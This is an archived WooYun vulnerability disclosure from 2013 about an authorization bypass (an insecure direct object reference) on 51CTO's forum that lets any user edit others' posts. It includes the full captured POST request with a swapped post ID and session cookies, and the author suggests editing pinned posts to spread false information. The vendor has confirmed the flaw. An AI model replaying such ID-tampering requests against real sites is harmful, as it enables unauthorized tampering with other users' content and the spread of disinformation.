当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039027

漏洞标题:51cto技术圈绕过管理权限修改任意帖子

相关厂商:51CTO技术网站

漏洞作者: Hero

提交时间:2013-10-07 17:07

修复时间:2013-11-21 17:07

公开时间:2013-11-21 17:07

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-07: 细节已通知厂商并且等待厂商处理中
2013-10-08: 厂商已经确认,细节仅向厂商公开
2013-10-18: 细节向核心白帽子及相关领域专家公开
2013-10-28: 细节向普通白帽子公开
2013-11-07: 细节向实习白帽子公开
2013-11-21: 细节向公众公开

简要描述:

为何你会忽略反射xss~

详细说明:

先修改自己的帖子进行抓包

1.jpg


分析后得知248203 为帖子id

2.jpg


把抓到包的帖子ID修改下在发出去会有什么神奇的事情发生呢!

3.jpg


4.jpg


帖子ID16257
POST /group_index.php?do=bbsedit&tid=16257&sid=16257&gname=job&actions=edit&page=1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://g.51cto.com/group_index.php?do=bbsedit&tid=248203&sid=248203&gname=job&actions=edit&page=1
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: g.51cto.com
Content-Length: 116
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: pub_cookietime=2592000; pub_sauth1=UFQAUVxUBFUFDDsFWg9UBQUAPVVVCgQAUVEFVgM; pub_sauth2=fccd5d0d3876be02a16afdff25c361e5; Hm_lvt_f77ea1ecd95cb2a1bc65cbcb3aaba7d4=1379586266,1380821364; pgv_pvi=73427968; lastvisit=983%091381132952%09%2Fjs%2Fgcount.php%3Fgid%3D32; _ourplusFirstTime=2013-10-7-15-44-35; _ourplusReturnTime=2013-10-7-15-44-35; bdshare_firstime=1381132089437; Hm_lvt_b415ab0b61d6ef0fd39070a1cc06ec69=1381132133; __utma=48738928.181960997.1381132133.1381132133.1381132133.1; __utmb=48738928.1.10.1381132133; __utmz=48738928.1381132133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=2fb2511a0843972941d1905d2d9df8c7
huifutitle=hackertest&job=2&actions=edit&tid=16257&gid=32&sid=16257&diyclass=0&atc_contentp=test&Submit=%CC%E1%BD%BB
把包修改后发出去

5.jpg


Nice
要是加入人气旺的帖子,修改管理的置顶帖子发虚假信息,后果你懂的~

漏洞证明:

同上~

修复方案:

你们比我懂~

版权声明:转载请注明来源 Hero@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-10-08 17:06

厂商回复:

感谢提交漏洞,我们会尽快修改。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-07 18:43 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    @疯狗 xsser 我想说是不是我提交的洞被系统默认屏蔽了。。。不审核啊